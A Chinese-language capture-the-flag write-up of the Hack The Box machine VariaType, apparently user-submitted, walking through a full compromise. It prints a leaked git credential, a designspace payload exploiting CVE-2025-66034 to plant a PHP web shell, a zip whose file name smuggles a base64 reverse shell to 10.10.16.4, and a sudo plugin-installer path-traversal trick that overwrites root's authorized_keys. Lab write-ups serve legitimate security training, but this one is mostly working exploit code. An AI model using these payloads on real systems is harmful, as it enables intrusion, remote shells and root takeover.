【渗透测试】HTB Season10 VariaType 全过程wp

VariaType

信息收集

进行子域名枚举得到
portal
portal.variatype.htb
扫描一下这个子域名的目录

可以看到git泄露
使用githack

1. gitbot/G1tB0t_Acc3ss_2025!

复制代码

漏洞利用(CVE-2025-66034)

我们在本地写一个exp.designspace

1. <?xml version='1.0' encoding='UTF-8'?>
2. <designspace format="5.0">
3.   
4.    
5.       <labelname xml:lang="en"><![CDATA[<?php system($_GET["cmd"]); ?>]]]]><![CDATA[>]]></labelname>
6.       <labelname xml:lang="fr">Regular</labelname>
7.     </axis>
8.   </axes>
9.   <sources>
10.     <source filename="source-light.ttf" name="Light">
11.       <location><dimension name="Weight" xvalue="100"/></location>
12.     </source>
13.     <source filename="source-regular.ttf" name="Regular">
14.       <location><dimension name="Weight" xvalue="400"/></location>
15.     </source>
16.   </sources>
17.   <variable-fonts>
18.     <variable-font name="MyFont" filename="/var/www/portal.variatype.htb/public/files/shell.php">
19.       
20.         
21.       </axis-subsets>
22.     </variable-font>
23.   </variable-fonts>
24. </designspace>

复制代码

也可以使用脚本
symphony2colour/varlib-cve-2025-66034：fontTools 可变字体生成流水线中针对 CVE-2025-66034 的概念验证漏洞。精心设计的 .designspace 文件允许控制输出路径，从而实现任意文件写入。该脚本自动化了有效载荷的创建、字体生成和上传，以演示这个问题。

1. python3 varlib_cve_2025_66034.py --ip 10.10.16.4 --port 4444 --path /var/www/portal.variatype.htb/public/files --trigger http://portal.variatype.htb/files --url http://variatype.htb/tools/variable-font-generator/process

复制代码

得到shell

横向移动

我们可以构造一个恶意的tar文件完成命令执行

1. echo 'bash -i >& /dev/tcp/10.10.16.4/5555 0>&1' | base64
3. import zipfile
4. payload = "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40LzU1NTUgMD4mMQo="
5. exploit_filename = f"$(echo {payload}|base64 -d|bash).ttf"
6. with zipfile.ZipFile('/tmp/exploit.zip', 'w') as zipf:
7.     zipf.writestr(exploit_filename, "dummy content")
8. print("exploit.zip created")

复制代码

1. wget http://10.10.16.4/exploit.zip

复制代码

权限提升

查看/opt/font-tools/install_validator.py

1. #!/usr/bin/env python3
2. """
3. Font Validator Plugin Installer
4. --------------------------------
5. Allows typography operators to install validation plugins
6. developed by external designers. These plugins must be simple
7. Python modules containing a validate_font() function.
9. Example usage:
10.   sudo /opt/font-tools/install_validator.py https://designer.example.com/plugins/woff2-check.py
11. """
13. import os
14. import sys
15. import re
16. import logging
17. from urllib.parse import urlparse
18. from setuptools.package_index import PackageIndex
20. # Configuration
21. PLUGIN_DIR = "/opt/font-tools/validators"
22. LOG_FILE = "/var/log/font-validator-install.log"
24. # Set up logging
25. os.makedirs(os.path.dirname(LOG_FILE), exist_ok=True)
26. logging.basicConfig(
27.     level=logging.INFO,
28.     format='%(asctime)s [%(levelname)s] %(message)s',
29.     handlers=[
30.         logging.FileHandler(LOG_FILE),
31.         logging.StreamHandler(sys.stdout)
32.     ]
33. )
35. def is_valid_url(url):
36.     try:
37.         result = urlparse(url)
38.         return all([result.scheme in ('http', 'https'), result.netloc])
39.     except Exception:
40.         return False
42. def install_validator_plugin(plugin_url):
43.     if not os.path.exists(PLUGIN_DIR):
44.         os.makedirs(PLUGIN_DIR, mode=0o755)
46.     logging.info(f"Attempting to install plugin from: {plugin_url}")
48.     index = PackageIndex()
49.     try:
50.         downloaded_path = index.download(plugin_url, PLUGIN_DIR)
51.         logging.info(f"Plugin installed at: {downloaded_path}")
52.         print("[+] Plugin installed successfully.")
53.     except Exception as e:
54.         logging.error(f"Failed to install plugin: {e}")
55.         print(f"[-] Error: {e}")
56.         sys.exit(1)
58. def main():
59.     if len(sys.argv) != 2:
60.         print("Usage: sudo /opt/font-tools/install_validator.py <PLUGIN_URL>")
61.         print("Example: sudo /opt/font-tools/install_validator.py https://internal.example.com/plugins/glyph-check.py")
62.         sys.exit(1)
64.     plugin_url = sys.argv[1]
66.     if not is_valid_url(plugin_url):
67.         print("[-] Invalid URL. Must start with http:// or https://")
68.         sys.exit(1)
70.     if plugin_url.count('/') > 10:
71.         print("[-] Suspiciously long URL. Aborting.")
72.         sys.exit(1)
74.     install_validator_plugin(plugin_url)
76. if __name__ == "__main__":
77.     if os.geteuid() != 0:
78.         print("[-] This script must be run as root (use sudo).")
79.         sys.exit(1)
80.     main()

复制代码

1. sudo /usr/bin/python3 /opt/font-tools/install_validator.py 'http://10.10.16.4//root/.ssh/authorized_keys'

复制代码

这里可以看到，name被取做了authorized_keys。我们修改编码。这样做是为了让我们的服务器能够正确找到文件，并且也让%2froot%2f.ssh%2fauthorized_keys成为name参数

1. sudo /usr/bin/python3 /opt/font-tools/install_validator.py 'http://10.10.16.4/%2froot%2f.ssh%2fauthorized_keys'

复制代码

已经成功让目标机器把 Kali 的 authorized_keys 下载到了 /root/.ssh/authorized_keys，这意味着你可以直接用 SSH 免密登录 root 账号，拿到最高权限。
直接ssh@variatype.htb

来源：程序园用户自行投稿发布，如果侵权，请联系站长删除
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！